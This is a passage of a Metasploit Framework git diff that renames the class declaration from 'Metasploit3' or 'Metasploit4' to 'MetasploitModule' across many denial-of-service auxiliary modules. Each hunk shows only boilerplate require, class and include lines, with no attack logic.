Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok. diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 4329b358db..38dc4e8948 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 8f9e60c3ff..70e9ec24cc 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 1567e9536f..3bced8e4a6 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 4cf177b852..2de44aae5d 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index e21ccb27b4..2c83a27686 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index fbe1395df8..faf1cceed4 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index d04a70f6a0..72784a7589 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb index f120cc3aa2..30a34e6db2 100644 --- a/modules/auxiliary/dos/misc/memcached.rb +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 73a64cd658..cabca95f30 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 949a673013..9d96f4b83c 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index ec88b8823a..82987c5a44 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 34a5af994f..f7154392e6 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index a550c617b1..29c49031b9 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/struct2' require 'rex/proto/smb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb index e4aa509cd1..9eeeadf3ed 100644 --- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb +++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 10cfb38841..dab3f2bda3 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 76e35d1b59..6317644378 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -17,7 +17,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/scada/igss9_dataserver.rb b/modules/auxiliary/dos/scada/igss9_dataserver.rb index a97481a1af..debb192254 100644 --- a/modules/auxiliary/dos/scada/igss9_dataserver.rb +++ b/modules/auxiliary/dos/scada/igss9_dataserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 4149967eaf..4badcfb019 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 86fc52f7f2..e6b422ee8c 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 3ec73403ae..ec9d7a1492 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2dddf9a25f..e045bd5348 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index 78ad298e42..c1939e64e4 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 76f0db506d..70ac830a9e 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -6,7 +6,7 @@ # auxilary/dos/ssl/openssl_aesni require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index c9704300cb..036d5708b4 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index a44a526850..d2b27eecd1 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 0ba1568205..9243b54a8d 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb index cee1464fe9..fa074f33a7 100644 --- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb +++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 9dfea04d72..f239bce52f 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 18ac1c4212..cb7f6b02a2 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 5686914817..570ef3994d 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index b082718fe9..78e2cbfc31 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index 8a2a932f4f..7b62702876 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index ac1e6022f9..8cccf0ebb4 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index dc8ec4092e..415e837c28 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index b2288b7b1c..59b12e6922 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index e97dc9134f..960caad59d 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 4db6db9836..f83dbc13dc 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index b948914501..fc65243095 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index db9d2e31c5..3e6f11f24c 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ed94c74c86..e93a079cfc 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index c2fddc489a..19130361c1 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index c1003c6a87..517ce4a0c8 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index daf6ad587d..2dfb95de64 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index afb0eda518..f8be0ff9d5 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 09189c625e..d251700318 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index 61ea317635..a64a28454f 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 79d649c253..e1e0065efc 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index fffd69b8dd..29ec0f804c 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index f60c224d7d..d5a480e758 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 65d494e2a3..7b51b4ae98 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 78ebe1e3af..6763919a40 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index fe436b7ef0..41a1ad0808 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 692d3080de..08c0cb47db 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index 25fec756b7..5cff79cdfd 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 51fa2bab02..46aaf309f2 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 2ba38d2064..1b6a17314a 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index d514712000..70abc3470a 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 72166cc782..97e837d932 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb 